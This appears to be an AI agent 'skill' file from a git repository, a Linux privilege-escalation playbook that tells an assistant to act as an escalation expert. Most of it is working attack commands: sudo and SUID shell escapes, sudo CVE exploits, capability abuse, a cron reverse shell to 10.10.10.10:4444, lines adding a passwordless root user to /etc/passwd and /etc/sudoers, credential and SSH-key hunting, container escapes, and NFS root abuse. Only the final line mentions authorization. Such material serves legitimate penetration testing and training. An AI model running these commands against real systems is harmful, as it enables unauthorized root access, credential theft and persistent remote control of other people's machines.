zhongwei/gh-trilwu-secskills-secskills
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
33a29e697aa02f2496e9797c09d2dfab3440254e
gh-trilwu-secskills-secskills/skills/linux-privilege-escalation/SKILL.md
Zhongwei Li 33a29e697a Initial commit
2025-11-30 09:03:09 +08:00

569 lines
13 KiB
Markdown
Raw Blame History

---
name: escalating-linux-privileges
description: Escalate privileges on Linux systems using SUID/SGID binaries, capabilities, sudo misconfigurations, cron jobs, kernel exploits, and container escapes. Use when performing Linux post-exploitation or privilege escalation.
---
# Linux Privilege Escalation Skill
You are a Linux security expert specializing in privilege escalation techniques. Use this skill when the user requests help with:
- Escalating privileges on Linux systems
- Identifying misconfigurations and vulnerabilities
- Exploiting SUID/SGID binaries
- Abusing Linux capabilities
- Kernel exploitation
- Container escape techniques
- Sudo misconfigurations and bypasses
- Cron job exploitation
- Path hijacking attacks
## Core Methodologies
### 1. Initial System Enumeration
**System Information:**
```bash
# OS and kernel version
cat /proc/version
uname -a
lsb_release -a
cat /etc/os-release
# Check for kernel exploits
searchsploit "Linux Kernel $(uname -r)"
uname -r
# CPU and system stats
lscpu
cat /proc/cpuinfo
df -h
```
**Current User Context:**
```bash
# Who am I?
id
whoami
groups
sudo -l
# Environment variables (passwords, API keys?)
env
set
cat /proc/self/environ | tr '\0' '\n'
# Check PATH for hijacking opportunities
echo $PATH
```
**Users and Groups:**
```bash
# All users
cat /etc/passwd
cat /etc/passwd | grep -v "nologin\|false" | cut -d: -f1
# Users with bash
cat /etc/passwd | grep "/bin/bash"
# User details
cat /etc/shadow # If readable
cat /etc/group
# Home directories
ls -la /home/
```
### 2. Sudo Exploitation
**Check Sudo Permissions:**
```bash
# What can I run as root?
sudo -l
# Check sudo version for known vulns
sudo -V
sudo --version
```
**Common Sudo Misconfigurations:**
```bash
# NOPASSWD entries
sudo -l | grep NOPASSWD
# Wildcards exploitation
# If: (root) NOPASSWD: /bin/cp /tmp/* /var/www/html/
# Then: Create malicious file in /tmp, overwrite system files
# Shell escapes from sudo
# If you can run vim, less, more, man, etc. with sudo:
sudo vim -c ':!/bin/bash'
sudo less /etc/profile # then !/bin/bash
sudo awk 'BEGIN {system("/bin/bash")}'
sudo find . -exec /bin/bash \; -quit
sudo nmap --interactive # then !bash
```
**Sudo CVEs:**
```bash
# CVE-2021-3156 (Baron Samedit) - Sudo < 1.9.5p2
sudoedit -s /
sudoedit -s '\' $(python3 -c 'print("A"*1000)')
# CVE-2019-14287 - Sudo < 1.8.28
# If: (ALL, !root) /bin/bash
sudo -u#-1 /bin/bash
# CVE-2019-18634 - Sudo pwfeedback
# Exploitable if pwfeedback is enabled in /etc/sudoers
```
**GTFOBins for Sudo:**
```bash
# Check https://gtfobins.github.io/ for specific binary
# Examples:
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
sudo git -p help # then !/bin/bash
sudo docker run -v /:/mnt --rm -it alpine chroot /mnt sh
```
### 3. SUID/SGID Binaries
**Find SUID/SGID Files:**
```bash
# Find SUID binaries (4000)
find / -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
# Find SGID binaries (2000)
find / -perm -2000 -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
# Find both SUID and SGID
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2>/dev/null
# Interesting locations
find /usr/local/bin -perm -4000 2>/dev/null
find /usr/bin -perm -4000 2>/dev/null
find /bin -perm -4000 2>/dev/null
```
**Exploiting SUID Binaries:**
```bash
# Check GTFOBins for each SUID binary found
# https://gtfobins.github.io/
# Common exploitable SUID binaries:
# /usr/bin/find
find . -exec /bin/bash -p \; -quit
# /usr/bin/vim
vim -c ':py3 import os; os.execl("/bin/bash", "bash", "-pc", "reset; exec bash -p")'
# /usr/bin/nmap (old versions)
nmap --interactive
!sh
# /usr/bin/less
less /etc/profile
!/bin/bash
# /usr/bin/awk
awk 'BEGIN {system("/bin/bash -p")}'
# /usr/bin/perl
perl -e 'exec "/bin/bash";'
# /usr/bin/python
python -c 'import os; os.execl("/bin/bash", "bash", "-p")'
# /usr/bin/php
php -r "pcntl_exec('/bin/bash', ['-p']);"
# Custom SUID binary (check for command injection, buffer overflow)
strings /path/to/suid_binary
ltrace /path/to/suid_binary
strace /path/to/suid_binary
```
### 4. Linux Capabilities
**What Are Capabilities:**
Capabilities divide root privileges into distinct units. A binary with specific capabilities can perform privileged operations without full root.
**Enumerate Capabilities:**
```bash
# Find binaries with capabilities
getcap -r / 2>/dev/null
/usr/sbin/getcap -r / 2>/dev/null
# Check specific binary
getcap /usr/bin/python3.8
# Check process capabilities
cat /proc/self/status | grep Cap
getpcaps $$
# Decode capability value
capsh --decode=0000003fffffffff
```
**Exploitable Capabilities:**
```bash
# cap_setuid - allows changing UID
# Python with cap_setuid
python -c 'import os; os.setuid(0); os.system("/bin/bash")'
# Perl with cap_setuid
perl -e 'use POSIX; POSIX::setuid(0); exec "/bin/bash";'
# cap_dac_read_search - bypass file read permission checks
# tar with cap_dac_read_search
tar cvf shadow.tar /etc/shadow
tar -xvf shadow.tar
# cap_chown - change file ownership
# Python with cap_chown
python -c 'import os; os.chown("/etc/shadow",1000,1000)'
# cap_sys_admin - various admin operations (often container escape)
# Can mount filesystems, load kernel modules, etc.
# cap_sys_ptrace - inject code into processes
# gdb with cap_sys_ptrace
gdb -p <PID>
call system("id")
# cap_sys_module - load kernel modules
# Can load malicious kernel module for root
# cap_net_raw + cap_net_admin - network packet manipulation
# tcpdump with these caps can be used for ARP spoofing
```
### 5. Cron Jobs Exploitation
**Enumerate Cron Jobs:**
```bash
# System-wide cron
cat /etc/crontab
ls -la /etc/cron.*
ls -la /etc/cron.d/
ls -la /var/spool/cron/
ls -la /var/spool/cron/crontabs/
# User crontabs
crontab -l
crontab -l -u username
# Check for running cron
ps aux | grep cron
systemctl status cron
```
**Exploiting Writable Cron Scripts:**
```bash
# If a cron script is writable
echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' >> /path/to/cron/script.sh
# Wait for cron to execute
/tmp/rootbash -p
# Reverse shell payload
echo 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1' >> /path/to/cron/script.sh
```
**PATH Exploitation in Cron:**
```bash
# If cron uses relative paths without full path
# Example: /etc/crontab contains: * * * * * root backup.sh
# Create malicious backup.sh in /tmp/ and modify PATH
echo '/bin/bash -c "cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash"' > /tmp/backup.sh
chmod +x /tmp/backup.sh
```
**Wildcards in Cron:**
```bash
# If cron job has: tar czf /backup/backup.tar.gz *
# Create malicious files
echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' > exploit.sh
chmod +x exploit.sh
touch -- --checkpoint=1
touch -- --checkpoint-action=exec=exploit.sh
# When tar runs with wildcard, it executes exploit.sh
```
### 6. Writable Files and Directories
**Find Writable Files:**
```bash
# World-writable files
find / -writable -type f 2>/dev/null | grep -v "/proc/"
find / -perm -2 -type f 2>/dev/null
# Files owned by current user
find / -user $(whoami) 2>/dev/null
find / -group $(groups | cut -d' ' -f1) 2>/dev/null
# Writable /etc/ files (critical)
find /etc -writable -type f 2>/dev/null
```
**Critical Writable Files:**
```bash
# /etc/passwd - add root user
echo 'newroot::0:0:root:/root:/bin/bash' >> /etc/passwd
su newroot
# /etc/shadow - overwrite root hash
# Generate hash: openssl passwd -6 password
# Replace root line
# /etc/sudoers - add sudo permission
echo 'username ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers
# /etc/crontab - add malicious cron
echo '* * * * * root /tmp/exploit.sh' >> /etc/crontab
# ~/.ssh/authorized_keys - add SSH key
ssh-keygen -t rsa
cat ~/.ssh/id_rsa.pub >> /root/.ssh/authorized_keys
```
### 7. Kernel Exploits
**Identify Kernel Version:**
```bash
uname -a
cat /proc/version
uname -r
```
**Search for Exploits:**
```bash
# SearchSploit
searchsploit "Linux Kernel $(uname -r | cut -d'-' -f1)"
searchsploit "Linux Kernel 4.4"
# Google search
# Search: "Linux kernel X.X.X exploit"
# Search: "Linux kernel X.X.X privilege escalation"
# Automated tools
linux-exploit-suggester.sh
linux-exploit-suggester-2.pl
```
**Common Kernel Exploits:**
```bash
# DirtyCow (CVE-2016-5195) - Kernel <= 3.19.0-73.8
# https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
# CVE-2022-0847 (Dirty Pipe) - Kernel 5.8 - 5.16.11
# Overwrite read-only files
# CVE-2021-4034 (PwnKit) - PolicyKit
# Local privilege escalation via pkexec
# CVE-2021-3156 (Baron Samedit) - Sudo < 1.9.5p2
# Compile and run
gcc -pthread exploit.c -o exploit -lcrypt
./exploit
```
**Kernel Exploit Resources:**
- https://github.com/lucyoa/kernel-exploits
- https://github.com/SecWiki/linux-kernel-exploits
- https://github.com/bwbwbwbw/linux-exploit-binaries
### 8. Container Escape
**Detect if in Container:**
```bash
# Check for .dockerenv
ls -la /.dockerenv
# Check cgroup
cat /proc/1/cgroup | grep docker
cat /proc/self/cgroup
# Check for container-specific files
ls -la /.containerenv # Podman
cat /proc/1/environ | grep container
```
**Container Escape Techniques:**
```bash
# Privileged container with access to /dev
# Mount host filesystem
fdisk -l
mkdir /mnt/host
mount /dev/sda1 /mnt/host
chroot /mnt/host
# Docker socket mounted (/var/run/docker.sock)
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# Cap_sys_admin capability
# Can mount host filesystem or abuse other admin functions
# containerd/runc escape (CVE-2019-5736)
# Overwrite runc binary on host
# Kubernetes pod escape
# Service account tokens: /run/secrets/kubernetes.io/serviceaccount/
kubectl --token=$(cat /run/secrets/kubernetes.io/serviceaccount/token) get pods
```
### 9. Password Hunting
**Search for Passwords:**
```bash
# Grep for password strings
grep -r "password" /home/ 2>/dev/null
grep -r "passwd" /var/www/ 2>/dev/null
grep -ir "pwd\|pass" /opt/ 2>/dev/null
# Configuration files
cat /var/www/html/config.php
cat /var/www/html/wp-config.php
cat ~/.bash_history
cat ~/.mysql_history
cat ~/.ssh/id_rsa
# Database files
find / -name "*.db" 2>/dev/null
find / -name "*.sqlite" 2>/dev/null
# Check environment
env | grep -i pass
# Check for credentials in scripts
find / -name "*.sh" -exec grep -l "password" {} \; 2>/dev/null
find / -name "*.py" -exec grep -l "password" {} \; 2>/dev/null
# Memory dumps
strings /dev/mem
strings /proc/kcore
# SSH keys
find / -name id_rsa 2>/dev/null
find / -name id_dsa 2>/dev/null
find / -name authorized_keys 2>/dev/null
```
### 10. NFS Exploits
**Check NFS Shares:**
```bash
# On target
cat /etc/exports
showmount -e localhost
# From attacker machine
showmount -e 10.10.10.10
# Common misconfig: no_root_squash
# /home *(rw,no_root_squash)
```
**Exploit no_root_squash:**
```bash
# On attacker (as root)
mkdir /tmp/nfs
mount -t nfs 10.10.10.10:/home /tmp/nfs
cd /tmp/nfs
# Create SUID binary
cp /bin/bash .
chmod +s bash
# On target
cd /home
./bash -p # root shell
```
## Automated Enumeration Tools
**LinPEAS (Recommended):**
```bash
# Download and run
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Or locally
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
```
**LinEnum:**
```bash
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh
```
**Linux Smart Enumeration (LSE):**
```bash
wget https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh
chmod +x lse.sh
./lse.sh -l1 # Level 1 (fast)
./lse.sh -l2 # Level 2 (thorough)
```
**pspy (Monitor Processes):**
```bash
# Monitor for cron jobs and processes without root
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
chmod +x pspy64
./pspy64
```
## Troubleshooting
**Exploit Not Working:**
- Check architecture: `uname -m` (x86_64, i686, arm, etc.)
- Compile on target system if possible
- Check kernel version exactly matches exploit requirements
- Verify exploit is for correct Linux distribution
- Check for security mitigations (AppArmor, SELinux, ASLR)
**SUID Binary Not Spawning Root Shell:**
- Use `-p` flag to preserve privileges: `/bin/bash -p`
- Some shells drop privileges; try different shells
- Check if binary has capabilities instead of SUID
**Cannot Compile Exploit:**
- Transfer pre-compiled binary
- Cross-compile on attacker machine
- Use statically compiled binaries
- Check for gcc, g++, make on target
**Permission Denied Errors:**
- Check file permissions carefully
- Verify you're in correct group
- Check AppArmor/SELinux is not blocking
- Try different attack vector
## Reference Links
- HackTricks Linux Privesc: https://github.com/HackTricks-wiki/hacktricks/tree/master/src/linux-hardening/privilege-escalation
- GTFOBins: https://gtfobins.github.io/
- PEASS-ng (LinPEAS): https://github.com/carlospolop/PEASS-ng
- PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md
- Linux Privilege Escalation Techniques: https://book.hacktricks.xyz/linux-hardening/privilege-escalation
## When to Use This Skill
Activate this skill when the user asks to:
- Escalate privileges on a Linux system
- Enumerate Linux privilege escalation vectors
- Exploit SUID binaries or capabilities
- Abuse sudo misconfigurations
- Escape from containers
- Identify kernel exploits
- Find and exploit cron job weaknesses
- Analyze Linux security misconfigurations
Always ensure proper authorization before performing privilege escalation on any system.
Reference in New Issue View Git Blame Copy Permalink